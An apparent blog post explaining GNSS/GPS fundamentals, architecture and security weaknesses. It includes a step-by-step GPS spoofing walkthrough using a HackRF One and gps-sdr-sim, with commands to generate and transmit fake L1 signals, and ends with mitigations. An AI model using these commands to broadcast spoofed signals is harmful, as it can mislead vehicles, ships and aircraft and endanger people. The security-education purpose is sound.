Introduction to GPS

GNSS stands for Global Navigation Satellite System, which is a satellite-based navigation system that provides geolocation for users in real-world situations. Different groups/countries invented different navigation systems such as GPS, GLONASS, etc. GNSS generally cannot fail, but if one fails, GNSS receivers can pick up signals from other systems.

We are going to discuss GPS (Global Positioning System), which was invented by the US military. GPS consists of approximately 31 satellites which are orbiting at an altitude of 20,200km from earth. These orbits are arranged in such a way  that at least 6 satellites are always within line of sight from anywhere on earth’s surface. Each satellite sends the signal with data about the location of the device and at what time it is transmitting. GPS positioning works on the TRILATERATION process, which means three satellites are used to share the accurate location (Latitude, Longitude, Height) of the user and a fourth satellite is used to maintain the clock/timing accuracy.

Let’s understand the Trilateration process quickly:

• Imagine each GPS satellite drawing an invisible sphere around itself, with you somewhere on its surface. A signal from one satellite alone can only tell you that you’re somewhere on that sphere, not exactly where.
• When a second satellite adds its signal, the two spheres overlap. Now your position is narrowed down to the line where those two spheres intersect a much smaller area.
• A third satellite joins in, and where all three spheres intersect is your exact position on Earth. This process is called trilateration using distances, not angles, to pinpoint a location.
• Finally, a fourth satellite helps fine-tune your clock and timing accuracy, since even tiny timing errors can cause big mistakes in distance calculations.

Applications of GPS  in the Real World

GPS is one of those technologies we use every day without even thinking about it. It shows up in so many domains, but it becomes especially useful in IoT and the automotive industry. From basic location tracking to mapping and navigation, makes a lot of things work smoothly.

As part of security, sometimes tracking the location of devices or humans is a must, and to overcome this issue, GPS technology always helps. Nowadays, GPS has become one of the most widely used technologies in our daily lives. It plays a crucial role in navigation and location-based services. For example, when someone travels to a new place, GPS helps them find accurate routes and directions. In the automotive sector, GPS is also used in taxis and fleet vehicles for tracking, geofencing, etc. and various other operational functions that enhance efficiency and safety.

Architecture of GPS

The  GPS system is divided into three parts: Space segment, User segment and Control Segment.

Space segment: The satellites help GPS to locate the position by broadcasting the signal used by the receiver. To calculate the position, the signals of four satellites should be locked, that’s why you need to keep moving around to get a clear reception.

User segment: This segment Including GPS receivers and transmitters, including items like watches, smartphones and telematic devices. it consist of a sensitive receiver which can detect signals and then convert the data into useful information. GPS receiver helps to locate your own position.

Control segment: It consists of Earth-based monitoring stations, master control stations, and ground antennas. These components work together to track and manage satellites in orbit while continuously monitoring their signal transmissions.

GPS Security Weaknesses

From a cybersecurity perspective, GPS technology carries inherent risks because of its weak signals. These signals can be easily disrupted or completely blocked by low-power interference, making GPS highly vulnerable to intentional attacks such as jamming, and as a result, larger operation failures can happen in transportation, IoT, etc. industries. Even many receivers cannot authenticate the signals to determine whether they are coming from a legitimate source. Because of this weakness in GPS, attackers can easily transmit counterfeit GPS signals to mislead their targets. This type of manipulation is commonly known as signal spoofing.

Fake Signals, Real Consequences: How GPS Spoofing Actually Works

GPS Spoofing means tampering with the signals from the satellite and making them appear legitimate, where a malicious actor generates GPS signals to mislead GPS receivers. This spoofing scenario is possible due to the signals coming from satellites being weak when they reach the earth.  GPS spoofing can cause serious consequences in transportation, misleading the car, ship or airplane. To demonstrate how this attack works in practice, we will now explore how GPS spoofing can be performed using a HackRF One RF device.

• Install the required dependencies and set up the HackRF device.
  $ sudo apt install gnuradio libhackrf0 hackrf libhackrf-dev
• Clone the gps-sdr-sim repository.
  $ git clone https://github.com/osqzss/gps-sdr-sim.git
  $ cp gps-sdr-sim &&
• Compile the source code using MAKE command
• Download the daily BRDC GPS ephemeris file from NASA CDDIS.
• Generate GPS signals for a specified location and time using the broadcast ephemeris file along with the desired latitude and longitude.
  $ ./gps-sdr-sim -b 8 -e brdc2700.25n -l 32.657181348472236,65.34605075320059 ,100 -d 600

• Now Transfer GPS signals using hackrf.
  $ sudo hackrf_transfer -t gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 0

GPS Spoofing Mitigations

Civilian GPS signals are intrinsically insecure and vulnerable to spoofing attacks. One way to get better confidence in these signals is through techniques like Navigation Message Authentication (NMA), which can help make sure the data is from legitimate satellite sources and not from an attacker.

In real world applications, particularly in the automotive sector, GPS alone is not sufficient. A more optimal solution is to combine GPS data with other onboard sensors. For example, the vehicle motion deduced from GPS can be validated based on sensor information like accelerometers, gyroscopes, or wheel speed data. If the GPS suddenly shows a change of several kilometers, the system can check this against sensor data to see if such a movement is physically possible. If it doesn’t match, the data can be marked as suspicious.

Another useful mitigation technique is to verify position using multiple sources. The system can use more than just GPS to determine location, it can also check against other sources such as cell network triangulation or Wi-Fi positioning. Any significant difference between these sources may signify a possible spoofing attempt.

Conclusion

After exploring the fundamentals of GNSS, understanding how GPS works, and experimenting with static GPS spoofing, I realized how deeply GPS is integrated into our daily lives and critical systems. While it provides tremendous benefits for navigation and positioning, it is also susceptible to manipulation through spoofing attacks. This highlights the importance of understanding these security risks and implementing appropriate safeguards to ensure the reliability and trustworthiness of GPS-dependent systems.